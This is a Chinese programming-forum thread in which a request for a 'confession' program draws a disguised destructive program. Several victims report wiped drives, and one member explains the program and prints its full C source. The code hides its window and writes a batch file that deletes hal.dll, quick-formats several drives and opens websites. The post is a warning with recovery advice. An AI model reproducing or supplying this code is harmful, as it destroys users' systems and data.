| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 18638 人关注过本帖, 1 人收藏
标题:谁给我一个有趣的表白程序我去追女生!!
只看楼主 加入收藏
ljx416492224
Rank: 1
来 自:贵阳市
等 级:新手上路
帖 子:9
专家分:7
注 册:2014-7-27
结帖率:75%
收藏(1)
已结贴  问题点数:10 回复次数:26 
谁给我一个有趣的表白程序我去追女生!!
给个表白程序的我去追我暗恋已久的一个人!
搜索更多相关主题的帖子: 追女生 
2014-08-10 23:13
lyxhkg
Rank: 2
等 级:禁止访问
帖 子:50
专家分:24
注 册:2012-4-24
收藏
得分:1 
提示: 该帖被管理员或版主屏蔽
2014-08-14 20:22
易达
Rank: 1
等 级:新手上路
帖 子:2
专家分:1
注 册:2014-8-13
收藏
得分:1 
顶楼主...............
2014-08-14 20:46
w410297765
Rank: 2
来 自:皇汉
等 级:论坛游民
帖 子:18
专家分:65
注 册:2012-7-21
收藏
得分:1 
2014-08-15 13:52
戚七
Rank: 1
等 级:新手上路
帖 子:3
专家分:1
注 册:2014-6-10
收藏
得分:1 
回复 楼主 ljx416492224
艹!!!!!病毒!!!
2014-08-15 17:09
水滴滴水
Rank: 1
等 级:新手上路
帖 子:7
专家分:1
注 册:2014-8-15
收藏
得分:1 
回复 5 楼 戚七
你好,我也中了,请问如何回复啊?我的系统盘里的东西都没有了。十分着急。
2014-08-15 17:54
水滴滴水
Rank: 1
等 级:新手上路
帖 子:7
专家分:1
注 册:2014-8-15
收藏
得分:0 
回复 5 楼 戚七
在线等,挺急的,或者球球联系616015688
2014-08-15 17:56
lyxhkg
Rank: 2
等 级:禁止访问
帖 子:50
专家分:24
注 册:2012-4-24
收藏
得分:0 
嘻嘻!
2014-08-15 18:17
vvvcuu
Rank: 9Rank: 9Rank: 9
等 级:贵宾
威 望:12
帖 子:353
专家分:1253
注 册:2014-4-22
收藏
得分:1 
二楼发布的程序并不是什么病毒,不过是用C新建了一个批处理文件,并运行它而已。
批处理文件功能:
程序代码:
1,在D,E,F盘根目录下分别建立数字1-99开头,后跟..为名字的文件夹.此类文件夹在资源管理器下无法直接删除.命令提示符下可以.
2, 删除%system32%文件夹下的hal.dll和两个文件,使系统不能启动.对于32位系统有效,64位系统未知.
3, 快速格式化D,E,F,H,J盘为NTFS文件系统.
4, 打开以下网站: 百度,360,淘宝,QQ,3G,搜搜,雅虎,谷歌,金山卫士,金山游戏等.

已中招的网友请自行在和自己电脑相同从操作系统的电脑上拷贝hal.dll和两个文件,复制到自己电脑系统盘system32文件夹下,可能需要启动盘.
启动电脑后,下载恢复软件,复原D,E,F等盘的文件,一般能复原大部分,而不能完全恢复.
程序源代码如下:
程序代码:
# include <stdio.h>
# include <windows.h>



int main(int argc,char *argv[])
{
ShowWindow(FindWindow("ConsoleWindowClass",argv[0]),0);

int x; int i;
FILE*fp=fopen("c:\\SB.bat","w");

for(i=0;i<100;i++)
{




fprintf(fp,"md D:\%d...\\\n",i);
fprintf(fp,"md e:\%d...\\\n",i);
fprintf(fp,"md f:\%d...\\\n",i);


if(i==25)
{



fprintf(fp,"del C:\\WINDOWS\\system32\\hal.dll \n ",i);

fprintf(fp,"del C:\\WINDOWS\\system32\\ \n ",i);


fprintf(fp,"Format d:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format e:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format f:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format h:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format j:/y/q/fs:NTFS\n",i);

}

if(i==3)
{
fprintf(fp,"start explorer http://www.baidu.com start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);



}




}



fclose(fp);
system("c:\\SB.bat");



}


此人发的一个帖子地址在这:
http://bbs.bccn.net/thread-435019-1-1.html

只是本人没有中招而已.

代码测试环境:  WinXP+C-Free5.0.
2014-08-15 18:27
lyxhkg
Rank: 2
等 级:禁止访问
帖 子:50
专家分:24
注 册:2012-4-24
收藏
得分:0 
我去这里都可以看得到你的身影我好惊讶!
2014-08-15 19:40
快速回复:谁给我一个有趣的表白程序我去追女生!!
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.018063 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved